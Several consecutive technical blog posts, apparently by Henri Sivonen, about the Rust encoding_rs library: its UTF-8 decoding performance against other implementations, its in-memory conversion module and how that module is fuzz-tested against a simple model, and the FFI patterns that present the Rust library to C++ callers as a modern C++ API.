The data cache footprint of the UTF-8 validation function in the Rust standard library is 256 bytes or four cache lines. The data cache footprint of encoding_rs’s UTF-8 validation function is 384 bytes or six cache lines, so 50% more. Using a lookup table to speed up a function that in principle should be doing just simple bit manipulation is a bit questionable, because benchmarks show behavior where the cost of bringing the lookup table to the cache is amortized across the benchmark iterations and the application-context cost of having to evict something else is not visible. For long inputs containing non-ASCII, using a lookup table is clearly justified. The effects on handling short strings as part of a larger system are unclear. As we’ve learned from Spectre, we shouldn’t assume that the 100% ASCII case avoids bringing the lookup table into the data cache.

WebKit

What bothers me the most about the benchmark results is that WebKit’s UTF-8 to UTF-16 decoder is faster than encoding_rs’s for the 100% ASCII case. That encoding_rs is faster for English Wikipedia content shows how specialized the WebKit win is. Closing the gap did not succeed using the same approach that worked in the case of closing the UTF-8 validation performance gap with the Rust standard library (which involved only reads, while decoding to UTF-16 involves writes, too). I don’t want to sacrifice encoding_rs’s performance in the case where the input isn’t 100% ASCII. The obvious solution would be to introduce very ASCII-biased prefix handling and moving to the current more balanced (between ASCII and non-ASCII) encoding_rs code when the first non-ASCII byte is seen. However, I don’t want to introduce a performance cliff like that. Consider a single copyright sign in a license header at the top of an otherwise ASCII file. For a long file, a good implementation should be able to climb back to the fast path after the copyright sign. As a consolation, the 100% ASCII case matters the most for CSS and JavaScript. In Gecko, the CSS case already uses UTF-8 validation instead of UTF-8 to UTF-16 conversion and JavaScript is on track to moving from UTF-8 to UTF-16 conversion to UTF-8 validation.

Interestingly, WebKit’s ASCII fast path is written as ALU code. I didn’t bother trying to locate the right disassembly, but if the performance is any indication, GCC must be unrolling and autovectorizing WebKit’s ASCII fast path.

kewb

Bob Steagall’s UTF-8 to UTF-16 decoder that combines SSE2 with a Deterministic Finite Automaton (DFA) is remarkably fast. While encoding_rs is a bit faster for Latin script with very infrequent non-ASCII (the threshold is between German and Portuguese) and for writing that doesn’t use ASCII spaces (Thai, Chinese, and Japanese), the DFA is faster for everything that involves more frequent transitions between ASCII and non-ASCII. I haven’t studied properly how the implementation manages the transitions between SSE2 and the DFA, but the result is awesome.

Compared to encoding_rs’s lookup table of 384 bytes or six cache lines, the DFA has a larger data cache footprint: the presentation slides say 896 bytes or 14 cache lines. As noted earlier, in the benchmarks the cost of bringing the tables into the cache are amortized across benchmark iterations and the cost of having to evict something else in a real-world application is not visible in a benchmark. Considering that encoding_rs::mem (discussed below) reuses encoding_rs’s UTF-8 to UTF-16 decoder for potentially short strings, I’m reluctant to adopt the DFA design that could have adverse cache effects in an application context.

One More Thing: encoding_rs::mem

The above discussion has been about encoding_rs in its role of converting between external encodings and the application-internal Unicode representation(s). That kind of usage calls for a well-designed streaming API when incremental processing of HTML (and XML) is one of the use cases. However, if an application has, for legacy reasons, multiple application-internal representations, converting between them generally calls less for streaming generality and more for API simplicity.

A Rust application written from scratch could do well with just one application-internal Unicode representation: UTF-8. However, Gecko, JavaScript, and the DOM API were created at the time when it was believed that Unicode was a 16-bit code space and that the application-internal Unicode representation should consist of 16-bit units. In the same era, Java, Windows NT, and Qt, among others, committed to 16-bit units in their internal Unicode representations.

With the benefit of hindsight, we can now say that it was a mistake to commit to 16-bit units in the application-internal Unicode representation. At the upper end of the code space, it became clear that 16 bits weren’t enough and Unicode was extended to 21 bits, so UTF-16 with surrogates was introduced, making a memory representation consisting of 16-bit units a variable-width representation anyway (even without considering grapheme clusters). At the lower end of the code space, it became clear that the ASCII range remains quite a bit more overrepresented than one might have expected by looking at how natural language is used around the world: various textual computer syntaxes tend to use ASCII. In the context of Gecko, the syntax of HTML, XML, CSS and JavaScript is ASCII.

To cope with these realities, Gecko now uses UTF-8 internally for some things and in some cases tries to store semantically UTF-16 data without the higher half of each code unit—i.e. storing data as Latin1 if possible. In Gecko, this approach is used for JavaScript strings and DOM text nodes. (This approach isn’t unique to Gecko. It is also used in V8, optionally in HotSpot and, with Latin1, UCS-2 and UTF-32 levels, in Python 3. Swift is moving away from a similar dual model to UTF-8.) When adding to the mix that Rust code is confident about UTF-8 validity but C++ isn’t, Gecko ends up with four kinds of internal text representations:

  • UTF-16 whose validity cannot be trusted
  • Latin1 that cannot be invalid
  • UTF-8 whose validity cannot be fully trusted
  • UTF-8 whose validity can be fully trusted

encoding_rs::mem provides efficient conversions between these four cases as well as functionality for checking if UTF-16 or UTF-8 only contains code points in the Latin1 range. Furthermore, the module also is able to check if text for sure does not contain any right-to-left text. While this check seems to be out of place in this module, it makes sense to combine this check with a Latin1ness check when creating DOM text nodes. Also, it makes sense to optimize the check using portable SIMD. (In Gecko, documents start their life as left-to-right-only. As long as they stay that way, the Unicode Bidirectional Algorithm can be optimized out in layout. However, whenever text is added to the document, it needs to be inspected to see if it might contain right-to-left characters. Once at least one such character is encountered, the document transitions into the bidi mode and the Unicode Bidirectional Algorithm is used in layout from then on.)

Notably, the use case of converting in-memory text is different from converting incrementally-parsed HTML or XML. Instead of providing streaming conversion, encoding_rs::mem provides conversions in a non-streaming manner, which enables a simpler API. In most cases, the caller is supposed to allocate the target buffer according to the maximum possible length requirement. As an exception, conversions to UTF-8 can be performed in multiple steps in order to avoid excessive allocation, considering that the maximum possible length requirement when converting from UTF-16 to UTF-8 is three times the minimum possible case. The general assumption is that when converting from UTF-16 to UTF-8, the buffer is first sized according to the minimum possible case and rounded up to the allocator bucket size, and if the result doesn’t fit, the maximum possible case is tried. When converting XPCOM strings, though, there’s an additional heuristic that looks at the first two cache lines of the UTF-16 buffer in order to make a guess whether the initial allocation should be larger than the minimum possible size.

Since Gecko uses an allocator with power-of-two buckets, it is not worthwhile to compute the buffer size requirements precisely. Being a bit wrong still often ends up in the same allocator bucket. Indeed, the new code that makes guesses and occasionally reallocates is generally faster than the old code that tried to compute the buffer size requirements precisely and ended up doing UTF math twice in the process.
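
A rough sketch of the two-step idea (assuming a partial conversion function along the lines of encoding_rs::mem::convert_utf16_to_utf8_partial, which reports how many code units were read and how many bytes were written; treat the exact name and signature, and the use of next_power_of_two as a stand-in for allocator-bucket rounding, as assumptions of this sketch):

    use encoding_rs::mem::convert_utf16_to_utf8_partial;

    fn utf16_to_utf8_guessing(src: &[u16]) -> Vec<u8> {
        // Start from the minimum possible requirement: one byte per code unit,
        // rounded up to an allocator-bucket-like size.
        let mut dst = vec![0u8; src.len().max(1).next_power_of_two()];
        let (read, written) = convert_utf16_to_utf8_partial(src, &mut dst[..]);
        if read < src.len() {
            // Did not fit: grow to the maximum possible requirement for the
            // rest (three bytes per remaining UTF-16 code unit) and finish.
            dst.resize(written + (src.len() - read) * 3, 0);
            let (_, more) = convert_utf16_to_utf8_partial(&src[read..], &mut dst[written..]);
            dst.truncate(written + more);
        } else {
            dst.truncate(written);
        }
        dst
    }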

The code for encoding_rs::mem looks rather unreviewable. It is that way for performance reasons. The messy look arises from SIMD with raw pointers, manual alignment handling and manual loop unrolling. To convince myself and others that the code does what it is supposed to do, I created another implementation of the same API in the simplest way possible using the Rust standard library facilities. Then I benchmarked the two to verify that my complicated code indeed was faster. Then I used cargo-fuzz to pass the same fuzzing input to both implementations and to check that their outputs agree (and that there are no panics or Address Sanitizer-reported problems).

This description of encoding_rs::mem looks thematically quite different from the earlier discussion of encoding_rs proper. Indeed, as far as API usage goes, encoding_rs::mem should be a separate crate. The only reason why it is a submodule is that the two share implementation details that don’t make sense to expose as a third crate with the public API. Users of encoding_rs that don’t need encoding_rs::mem should simply ignore the submodule and let link-time optimization discard it.

The combination of encoding_rs’s faster converter internals with the new allocation strategy that is a better fit for Gecko’s memory allocator was a clear performance win. My hope is that going forward conversion between UTF-8 and UTF-16 will be perceived as having acceptable enough a cost that Gecko developers will feel more comfortable with components that use UTF-8 internally even if it means that a conversion has to happen on a component boundary. On the other hand, I’m hoping to use this code to speed up a case where there already is a boundary even though the boundary is easy to forget: The WebIDL boundary between JavaScript and C++. Currently, when SpiderMonkey has a Latin1 string, it is expanded to UTF-16 at the DOM boundary, so e.g. using TextEncoder to encode an ASCII JavaScript string to UTF-8 involves expanding the string to UTF-16 and then encoding from UTF-16 to UTF-8 when just copying the bytes over should be logically possible.

Henri Sivonen: Using cargo-fuzz to Transfer Code Review of Simple Safe Code to Complex Code that Uses unsafe

encoding_rs::mem is a Rust module for performing conversions between different in-RAM text representations that are relevant to Gecko. Specifically, it converts between potentially invalid UTF-16, Latin1 (in the sense that unsigned byte value equals the Unicode scalar value), potentially invalid UTF-8, and guaranteed-valid UTF-8, and provides some operations on buffers in these encodings, such as checking if a UTF-16 or UTF-8 buffer only has code points in the ASCII range or only has code points in the Latin1 range. (You can read more about encoding_rs::mem in a write-up about encoding_rs as a whole.)

The whole point of this module is to make things very fast using Rust’s (not-yet-stable) portable SIMD features. The code was written before slices in the standard library had the align_to method or the chunks_exact method. Moreover, to get speed competitive with the instruction set-specific and manually loop-unrolled C++ code that the Rust code replaced, some loop unrolling is necessary, but Rust does not yet support directives for the compiler that would allow the programmer to request specific loop unrolling from the compiler.

As a result, the code is a relatively unreviewable combination of manual alignment calculations, manual loop unrolling and manual raw pointer handling. This indeed achieves high speed, but by looking at the code, it isn’t at all clear whether the code is actually safe or otherwise correct.

To validate the correctness of the rather unreviewable code, I used model-based testing with cargo-fuzz. cargo-fuzz provides Rust integration for LLVM’s libFuzzer coverage-guided fuzzer. That is, the fuzzer varies the inputs it tries based on observing how the inputs affect the branches taken inside the code being fuzzed. The fuzzer runs with one of LLVM’s sanitizers enabled. By default, the Address Sanitizer (ASAN) is used. (Even though the sanitizers should never find bugs in safe Rust code, the sanitizers are relevant to bugs in Rust code that uses unsafe.)

I wrote a second implementation (the “model”) of the same API in the most obvious way possible using Rust standard-library facilities and without unsafe, except where required to be able to write into an &mut str. I also used the second implementation to validate the speed of the complex implementation. Obviously, there’d be no point in having a complex implementation if it wasn’t faster than the simple and obvious one. (The complex implementation is, indeed, faster.)

For example, the function for checking whether a buffer of potentially invalid UTF-16 only contains characters in the Latin1 range is 8 lines (including the function name and the closing brace) in the safe version. In the fast version, it’s 3 lines that just call another function expanded from a macro, where the expansion is generated using either a 76-line SIMD-using macro or a 71-line ALU-using macro, depending on whether the code was compiled with SIMD enabled. Of these macros, the SIMD one calls another (tiny) function that has a specialized implementation for aarch64 and a portable implementation.

To use cargo-fuzz, you create a “fuzzer script”, which is a Rust function that gets a slice of bytes from the fuzzer and exercises the code being fuzzed. In the case of fuzzing encoding_rs::mem, the first byte is used to decide which function to exercise and the rest of the slice is used as the input to the function. When the function being called takes a slice of u16, a suitably aligned u16 subslice of the input is taken.

For each function, the fuzzer script calls both the complex implementation and the corresponding simple implementation with the same input and checks that the outputs match. The fuzzer finds a bug if the outputs don’t match, if there is a panic, or if the LLVM Address Sanitizer notices bad memory access, which could arise from the use of unsafe.
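
The overall shape of such a fuzzer script is roughly the following (a sketch with stand-in function names, not the actual fuzz target):

    #![no_main]
    use libfuzzer_sys::fuzz_target;

    // Stand-ins for the two implementations being compared; in the real setup,
    // the fast one comes from the crate under test and the simple one from the
    // model implementation.
    fn simple_is_utf16_latin1(units: &[u16]) -> bool {
        units.iter().all(|&u| u <= 0xFF)
    }
    fn fast_is_utf16_latin1(units: &[u16]) -> bool {
        simple_is_utf16_latin1(units) // placeholder for the optimized code
    }

    fuzz_target!(|data: &[u8]| {
        if data.is_empty() {
            return;
        }
        // The first byte selects the function to exercise; the rest is input.
        let (selector, rest) = (data[0], &data[1..]);
        match selector {
            0 => {
                // Take a suitably aligned u16 view of the input for &[u16] APIs.
                let (_, aligned, _) = unsafe { rest.align_to::<u16>() };
                assert_eq!(fast_is_utf16_latin1(aligned), simple_is_utf16_latin1(aligned));
            }
            _ => {
                // Other selector values would exercise other API functions.
            }
        }
    });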

Once the fuzzer fails to find problems after having run for a few days, we can have high confidence that the complex implementation is correct in the sense that its observable behavior, ignoring speed, matches the observable behavior of the simple implementation. Therefore, a code review for the correctness of the simple implementation can, with high confidence, be considered to apply to the complex implementation as well.

Henri SivonenHow I Wrote a Modern C++ Library in Rust

Since version 56, Firefox has had a new character encoding conversion library called encoding_rs. It is written in Rust and replaced the old C++ character encoding conversion library called uconv that dated from early 1999. Initially, all the callers of the character encoding conversion library were C++ code, so the new library, despite being written in Rust, needed to feel usable when used from C++ code. In fact, the library appears to C++ callers as a modern C++ library. Here are the patterns that I used to accomplish that.

(There is another write-up about encoding_rs itself. I presented most of the content in this write-up in my talk at RustFest Paris: video, slides.)

Modern C++ in What Way?

By “modern” C++ I mean that the interface that C++ callers see conforms to the C++ Core Guidelines and uses certain new features:

  • Heap allocations are managed by returning pointers to heap-allocated objects within std::unique_ptr / mozilla::UniquePtr.
  • Caller-allocated buffers are represented using gsl::span / mozilla::Span instead of plain pointer and length.
  • Multiple return values are represented using std::tuple / mozilla::Tuple instead of out params.
  • Non-null plain pointers are annotated using gsl::not_null / mozilla::NotNull.

gsl:: above refers to the Guidelines Support Library, which provides things that the Core Guidelines expect to have available but that are not (yet) in the C++ standard library.

C++ Library in Rust?

By writing a C++ library “in Rust” I mean that the bulk of the library is actually a library written in Rust, but the interface provided to C++ callers makes it look and feel like a real C++ library as far as the C++ callers can tell.

Both C++ and Rust Have C Interop

C++ has a very complex ABI, and the Rust ABI is not frozen. However, both C++ and Rust support functions that use the C ABI. Therefore, interoperability between C++ and Rust involves writing things in such a way that C++ sees Rust code as C code and Rust sees C++ code as C code.

Simplifying Factors

This write-up should not be considered a comprehensive guide to exposing Rust code to C++. The interface to encoding_rs is simple enough that it lacks some complexities that one could expect from the general case of interoperability between the two languages. However, the factors that simplify the C++ exposure of encoding_rs can be taken as a guide to simplifications that one should seek to achieve in the interest of easy cross-language interoperability when designing libraries. Specifically:

  • encoding_rs never calls out to C++: The cross-language calls are unidirectional.
  • encoding_rs does not hold references to C++ objects after a call returns: There is no need for Rust code to manage C++ memory.
  • encoding_rs does not present an inheritance hierarchy either in Rust or in C++: There are no vtables on either side.
  • The datatypes that encoding_rs operates on are very simple: Contiguous buffers of primitives (buffers of u8/uint8_t and u16/char16_t).
  • Only the panic=abort configuration (i.e. a Rust panic terminates the program instead of unwinding the stack) is supported and the code presented here is only correct if that option is used. The code presented here does not try to prevent Rust panics from unwinding across the FFI, and letting a panic unwind across the FFI is Undefined Behavior.

A Very Quick Look at the API

To get an idea about the Rust API under discussion, let’s take a high-level look. The library has three public structs: Encoding, Decoder and Encoder. From the point of view of the library user, these structs are used like traits, superclasses or interfaces in the sense that they provide a uniform interface to various concrete encodings, but technically they are indeed structs. Instances of Encoding are statically allocated. Decoder and Encoder encapsulate the state of a streaming conversion and are allocated at run-time.

A reference to an Encoding, that is &'static Encoding, can be obtained either from a label (a textual identification extracted from protocol text) or from a named static. The Encoding can then be used as a factory for a Decoder, which is stack-allocated.

let encoding: &'static Encoding =
    Encoding::for_label( // by label
        byte_slice_from_protocol
    ).unwrap_or(
        WINDOWS_1252     // by named static
    );

let decoder: Decoder =
    encoding.new_decoder();

In the streaming case, a method for decoding from a caller-allocated slice into another caller-allocated slice is available on the Decoder. The decoder performs no heap allocations.

pub enum DecoderResult {
    InputEmpty,
    OutputFull,
    Malformed(u8, u8),
}

impl Decoder {
    pub fn decode_to_utf16_without_replacement(
        &mut self,
        src: &[u8],
        dst: &mut [u16],
        last: bool
    ) -> (DecoderResult, usize, usize)
}

In the non-streaming case, the caller does not need to deal with Decoder and Encoder at all. Instead, methods for handling an entire logical input stream in one buffer are provided on Encoding.

impl Encoding {
    pub fn decode_without_bom_handling_and_without_replacement<'a>(
        &'static self,
        bytes: &'a [u8],
    ) -> Option<Cow<'a, str>>
}

The Process

0. Designing for FFI-friendliness

Some of the simplifying factors arise from the problem domain itself. Others are a matter of choice.

A character encoding library could reasonably present traits (similar to abstract superclasses with no fields in C++) for each of the concepts of an encoding, a decoder and an encoder. Instead, encoding_rs has structs for these that internally match on an enum for dispatch instead of relying on a vtable.

pub struct Decoder { // no vtable
   variant: VariantDecoder,
   // ...
}

enum VariantDecoder { // no extensibility
    SingleByte(SingleByteDecoder),
    Utf8(Utf8Decoder),
    Gb18030(Gb18030Decoder),
    // ...
}

The primary motivation for this wasn’t so much eliminating vtables per se as making the hierarchy intentionally non-extensible. This reflects a philosophy that adding character encodings is not something that programmers should do. Instead, programs should use UTF-8 for interchange, and programs should support legacy encodings only to the extent necessary for compatibility with existing content. The non-extensibility of the hierarchy provides stronger type-safety. If you have an Encoding from encoding_rs, you can trust that it doesn’t exhibit characteristics that aren’t exhibited by the encodings defined in the Encoding Standard. That is, you can trust that it won’t behave like UTF-7 or EBCDIC.

Additionally, by dispatching on an enum, a decoder for one encoding can internally morph into a decoder for another encoding in response to BOM sniffing.

One might argue that the Rustic way to provide encoding converters would be making them into iterator adaptors that consume an iterator of bytes and yield Unicode scalar values or vice versa. In addition to iterators being more complex to expose across the FFI, iterators make it harder to perform tricks to accelerate ASCII processing. Taking a slice to read from and a slice to write to not only makes it easier to represent things in a C API (in C terms, a Rust slice decomposes to an aligned non-null pointer and a length) but also enables ASCII acceleration by processing more than one code unit at a time making use of the observation that multiple code units fit in a single register (either an ALU register or a SIMD register).
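
As an illustration of the ALU flavor of that trick (a sketch, not encoding_rs’s actual code), eight bytes can be checked for the ASCII range at once by testing the high bit of every byte in a single 64-bit word:

// Returns true if all eight bytes are in the ASCII range.
fn chunk_is_ascii(chunk: &[u8; 8]) -> bool {
    let word = u64::from_le_bytes(*chunk);
    word & 0x8080_8080_8080_8080 == 0
}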

If the Rust-native API deals only with primitives, slices and (non-trait object) structs, it is easier to map to a C API than a Rust API that deals with fancier Rust features. (In Rust, you have a trait object when type erasure happens. That is, you have a trait-typed reference that does not say the concrete struct type of the referent that implements the trait.)

1. Creating the C API

When the types involved are simple enough, the main mismatches between C and Rust are the lack of methods and multiple return values in C and the inability to transfer non-C-like structs by value.

  • Methods are wrapped by functions whose first argument is a pointer to the struct whose method is being wrapped.
  • Slice arguments become two arguments: the pointer to the start of the slice and the length of the slice (see the sketch after this list).
  • One primitive value is returned as a function return value and the rest become out params. When the output params clearly relate to inputs of the same type, it makes sense to use in/out params.
  • When a Rust method returns the struct by value, the wrapper function boxes it and returns a pointer such that the Rust side forgets about the struct. Additionally, a function for freeing a given struct type by pointer is added. Such a function simply turns the pointer back into a Box and drops the Box. The struct is opaque from the C point of view.
  • As a special case, the method for getting the name of an encoding, which in Rust would return &'static str, is wrapped by a function that takes a pointer to a writable buffer whose length must be at least the length of the longest name.
  • enums signaling the exhaustion of the input buffer, the output buffer becoming full, or errors (with details about the error) became uint32_t with constants for “input empty” and “output full” and rules for how to interpret the other error details. This isn’t ideal but works pretty well in this case.
  • Overflow-checking length computations are presented as saturating instead. That is, the caller has to treat SIZE_MAX as a value signaling overflow.
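
Applied to the streaming decode method shown earlier, these rules might combine into a wrapper roughly like the following sketch (the exact names and parameter choices in the real C API may differ; decoder_result_to_u32 is the enum-to-u32 helper whose definition appears later in this write-up):

#[no_mangle]
pub unsafe extern "C" fn decoder_decode_to_utf16_without_replacement(
    decoder: *mut Decoder,
    src: *const u8,
    src_len: *mut usize, // in: length of src; out: bytes read
    dst: *mut u16,
    dst_len: *mut usize, // in: length of dst; out: code units written
    last: bool)
    -> u32
{
    let src_slice = ::std::slice::from_raw_parts(src, *src_len);
    let dst_slice = ::std::slice::from_raw_parts_mut(dst, *dst_len);
    let (result, read, written) = (*decoder)
        .decode_to_utf16_without_replacement(src_slice, dst_slice, last);
    *src_len = read;
    *dst_len = written;
    decoder_result_to_u32(result)
}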

2. Re-Creating the Rust API in C++ over the C API

Even an idiomatic C API doesn’t make for a modern C++ API. Fortunately, Rustic concepts like multiple return values and slices can be represented in C++, and by reinterpreting pointers returned by the C API as pointers to C++ objects, it’s possible to present the ergonomics of C++ methods.

Most of the examples are from a version of the API that uses C++17 standard library types. In Gecko, we generally avoid the C++ standard library and use a version of the C++ API to encoding_rs that uses Gecko-specific types. I assume that the standard-library-type examples make more sense to a broader audience.

Method Ergonomics

For each opaque struct pointer type in C, a class is defined in C++ and the C header is tweaked such that the pointer types become pointers to instances of the C++ classes from the point of view of the C++ compiler. This amounts to a reinterpret_cast of the pointers without actually writing out the reinterpret_cast.

Since the pointers don’t truly point to instances of the classes that they appear to point to but point to instances of Rust structs instead, it’s a good idea to take some precautions. No fields are declared for the classes. The default no-argument and copy constructors are deleted as is the default operator=. Additionally, there must be no virtual methods. (This last point is an important limitation that will come back to later.)

class Encoding final {
// ...
private:
    Encoding() = delete;
    Encoding(const Encoding&) = delete;
    Encoding& operator=(const Encoding&) = delete;
    ~Encoding() = delete;
};

In the case of Encoding, all of whose instances are static, the destructor is deleted as well. In the case of the dynamically-allocated Decoder and Encoder, both an empty destructor and a static void operator delete are added. (An example follows a bit later.) This enables the destruction of the fake C++ class to be routed to the right type-specific freeing function in the C API.

With that foundation in place to materialize pointers that look like pointers to C++ class instances, it’s possible to make method calls on these pointers work. (An example follows after introducing the next concept, too.)

Returning Dynamically-Allocated Objects

As noted earlier, the cases where the Rust API would return an Encoder or a Decoder by value so that the caller can place them on the stack are replaced by the FFI wrapper boxing the objects so that the C API exposes only heap-allocated objects by pointer. Also, the reinterpretation of these pointers as deletable C++ object pointers was already covered.

That still leaves making sure that delete is actually used at an appropriate time. In modern C++, when an object can have only one legitimate owner at a time, this is accomplished by wrapping the object pointer in std::unique_ptr or mozilla::UniquePtr. The old uconv converters supported reference counting, but all the actual uses in the Gecko code base involved only one owner for each converter. Since the usage patterns of encoders and decoders are such that there is only one legitimate owner at a time, using std::unique_ptr and mozilla::UniquePtr is what the two C++ wrappers for encoding_rs do.

Let’s take a look at a factory method on Encoding that returns a Decoder. In Rust, we have a method that takes a reference to self and returns Decoder by value.

impl Encoding {
    pub fn new_decoder(&'static self) -> Decoder {
        // ...
    }
}

On the FFI layer, we have an explicit pointer-typed first argument that corresponds to Rust &self and C++ this (specifically, the const version of this). We allocate memory on the heap (Box::new()) and place the Decoder into the allocated memory. We then forget about the allocation (Box::into_raw) so that we can return the pointer to C without deallocating at the end of the scope. In order to be able to free the memory, we introduce a new function that puts the Box back together and assigns it into a variable that immediately goes out of scope causing the heap allocation to be freed.

#[no_mangle]
pub unsafe extern "C" fn encoding_new_decoder(
    encoding: *const Encoding) -> *mut Decoder
{
    Box::into_raw(Box::new((*encoding).new_decoder()))
}

#[no_mangle]
pub unsafe extern "C" fn decoder_free(decoder: *mut Decoder) {
    let _ = Box::from_raw(decoder);
}

In the C header, they look like this:

ENCODING_RS_DECODER*
encoding_new_decoder(ENCODING_RS_ENCODING const* encoding);

void
decoder_free(ENCODING_RS_DECODER* decoder);

ENCODING_RS_DECODER is a macro that is used for substituting the right C++ type when the C header is used in the C++ context instead of being used as a plain C API.

On the C++ side, then, we use std::unique_ptr, which is the C++ analog of Rust’s Box. They are indeed very similar:

Rust:  let ptr: Box<Foo>
C++:   std::unique_ptr<Foo> ptr

Rust:  Box::new(Foo::new(a, b, c))
C++:   make_unique<Foo>(a, b, c)

Rust:  Box::into_raw(ptr)
C++:   ptr.release()

Rust:  let ptr = Box::from_raw(raw_ptr);
C++:   std::unique_ptr<Foo> ptr(raw_ptr);

We wrap the pointer obtained from the C API in a std::unique_ptr:

class Encoding final {
public:
    inline std::unique_ptr<Decoder> new_decoder() const
    {
        return std::unique_ptr<Decoder>(
            encoding_new_decoder(this));
    }
};

When the std::unique_ptr<Decoder> goes out of scope, the deletion is routed back to Rust via FFI thanks to declarations like this:

class Decoder final {
public:
    ~Decoder() {}
    static inline void operator delete(void* decoder)
    {
        decoder_free(reinterpret_cast<Decoder*>(decoder));
    }
private:
    Decoder() = delete;
    Decoder(const Decoder&) = delete;
    Decoder& operator=(const Decoder&) = delete;
};

How Can it Work?

In Rust, non-trait methods are just syntactic sugar:

impl Foo {
    pub fn get_val(&self) -> usize {
        self.val
    }
}

fn test(bar: Foo) {
    assert_eq!(bar.get_val(), Foo::get_val(&bar));
}

A method call on a non-trait-typed reference is just a plain function call with the reference to self as the first argument. On the C++ side, non-virtual method calls work the same way: A non-virtual C++ method call is really just a function call whose first argument is the this pointer.

On the FFI/C layer, we can pass the same pointer as an explicit pointer-typed first argument.

When calling ptr->Foo() where ptr is of type T*, the type of this is T* if the method is declared as void Foo() (which maps to &mut self in Rust) and const T* if the method is declared as void Foo() const (which maps to &self in Rust), so const-correctness is handled, too.

Rust:  fn foo(&self, bar: usize) -> usize
C++:   size_t foo(size_t bar) const

Rust:  fn foo(&mut self, bar: usize) -> usize
C++:   size_t foo(size_t bar)

The qualifications about “non-trait-typed” and “non-virtual” are important. For the above to work, we can’t have vtables on either side. This means no Rust trait objects and no C++ inheritance. In Rust, trait objects, i.e. trait-typed references to any struct that implements the trait, are implemented as two pointers: one to the struct instance and another to the vtable appropriate for the concrete type of the data. We need to be able to pass reference to self across the FFI as a single pointer, so there’s no place for the vtable pointer when crossing the FFI. In order to keep pointers to C++ objects as C-compatible plain pointers, C++ puts the vtable pointer on the objects themselves. Since the pointers don’t really point to C++ objects carrying vtable pointers but point to Rust objects, we must make sure not to make the C++ implementation expect to find a vtable pointer on the pointee.

As a consequence, the C++ reflector classes for the Rust structs cannot inherit from a common base class of a C++ framework. In the Gecko case, the reflector classes cannot inherit from nsISupports. E.g. in the context of Qt, the reflector classes wouldn’t be able to inherit from QObject.

Non-Nullable Pointers

There are methods in the Rust API that return &'static Encoding. Rust references can never be null, and it would be nice to relay this piece of information in the C++ API. It turns out that there is a C++ idiom for this: gsl::not_null and mozilla::NotNull.

Since gsl::not_null and mozilla::NotNull are just type system-level annotations that don’t change the machine representation of the underlying pointer, and since from the guarantees that Rust makes we know which pointers obtained from the FFI are really never null, it is tempting to apply the same trick of lying to the C++ compiler about types that we use to reinterpret pointers returned by the FFI as pointers to fieldless C++ objects with no virtual methods, and to claim in a header file that the pointers that we know not to be null in the FFI return values are of the type mozilla::NotNull<const Encoding*>. Unfortunately, this doesn’t actually work, because types involving templates are not allowed in the declarations of extern "C" functions in C++, so the C++ code ends up executing a branch for the null check when wrapping pointers received from the C API with gsl::not_null or mozilla::NotNull.

However, there are also declarations of static pointers to the constant encoding objects (where the pointees are defined in Rust) and it happens that C++ does allow declaring those as gsl::not_null<const Encoding*>, so that is what is done. (Thanks to Masatoshi Kimura for pointing out that this is possible.)

The statically-allocated instances of Encoding are declared in Rust like this:

pub static UTF_8_INIT: Encoding = Encoding {
    name: "UTF-8",
    variant: VariantEncoding::Utf8,
};

pub static UTF_8: &'static Encoding = &UTF_8_INIT;

In Rust, the general rule is that you use static for an unchanging memory location and const for an unchanging value. Therefore, UTF_8_INIT should be static and UTF_8 should be const: the value of the reference to the static instance is unchanging, but statically allocating a memory location for the reference is not logically necessary. Unfortunately, Rust has a rule that says that the right-hand side of const may not contain anything static and this is applied so heavily as to prohibit even references to static, in order to ensure that the right-hand side of a const declaration can be statically checked to be suitable for use within any imaginable const declaration—even one that tried to dereference the reference at compile time.

For FFI, though, we need to allocate an unchanging memory location for a pointer to UTF_8_INIT, because such memory locations work in C linkage and allow us to provide a pointer-typed named thing to C. The representation of UTF_8 above is already what we need, but for Rust ergonomics, we want UTF_8 to participate in Rust’s crate namespacing. This means that from the C perspective the name gets mangled. We waste some space by statically allocating pointers again without name mangling for C usage:

pub struct ConstEncoding(*const Encoding);

unsafe impl Sync for ConstEncoding {}

#[no_mangle]
pub static UTF_8_ENCODING: ConstEncoding =
    ConstEncoding(&UTF_8_INIT);

A pointer type is used to make it clear that C is supposed to see a pointer (even if a Rust reference type would have the same representation). However, the Rust compiler refuses to compile a program with a globally-visible pointer. Since globals are reachable from different threads, multiple threads accessing the pointee might be a problem. In this case, the pointee cannot be mutated, so global visibility is fine. To tell the compiler that this is fine, we need to implement the Sync marker trait for the pointer. However, traits cannot be implemented on pointer types. As a workaround, we create a newtype for *const Encoding. A newtype has the same representation as the type it wraps, but we can implement traits on the newtype. Implementing Sync is unsafe, because we are asserting to the compiler that something is OK when the compiler does not figure it out on its own.

In C++, we can then write (what the macros expand to):

extern "C" {
    extern gsl::not_null<const encoding_rs::Encoding*> const UTF_8_ENCODING;
}

The pointers to the encoders and decoders are also known not to be null, since allocation failure would terminate the program, but std::unique_ptr / mozilla::UniquePtr and gsl::not_null / mozilla::NotNull cannot be combined.

Optional Values

In Rust, it’s idiomatic to use Option<T> to represent return values that might or might not have a value. C++ these days provides the same thing as std::optional<T>. In Gecko, we instead have mozilla::Maybe<T>.

Rust’s Option<T> and C++’s std::optional<T> indeed are basically the same thing:

Rust:  return None;
C++:   return std::nullopt;

Rust:  return Some(foo);
C++:   return foo;

Rust:  is_some()
C++:   operator bool() / has_value()

Rust:  unwrap()
C++:   value()

Rust:  unwrap_or(bar)
C++:   value_or(bar)

Unfortunately, though, C++ reverses the safety ergonomics. The most ergonomic way to extract the wrapped value from a std::optional<T> is via operator*(), which is unchecked and, therefore, unsafe. 😭

Multiple Return Values

While C++ lacks language-level support for multiple return values, multiple return values are possible thanks to library-level support. In the case of the standard library, the relevant library pieces are std::tuple, std::make_tuple and std::tie. In the case of Gecko, the relevant library pieces are mozilla::Tuple, mozilla::MakeTuple and mozilla::Tie.

Rust:  fn foo() -> (T, U, V)
C++:   std::tuple<T, U, V> foo()

Rust:  return (a, b, c);
C++:   return {a, b, c};

Rust:  let (a, b, c) = foo();
C++:   const auto [a, b, c] = foo();

Rust:  let (mut a, mut b, mut c) = foo();
C++:   auto [a, b, c] = foo();

Slices

A Rust slice wraps a non-owning pointer and a length that identify a contiguous part of an array. In comparison to C:

Rust:  src: &[u8]
C:     const uint8_t* src, size_t src_len

Rust:  dst: &mut [u8]
C:     uint8_t* dst, size_t dst_len

There isn’t a corresponding thing in the C++ standard library yet (except std::string_view for read-only string slices), but it’s already part of the C++ Core Guidelines and is called a span there.

Rust:  src: &[u8]
C++:   gsl::span<const uint8_t> src

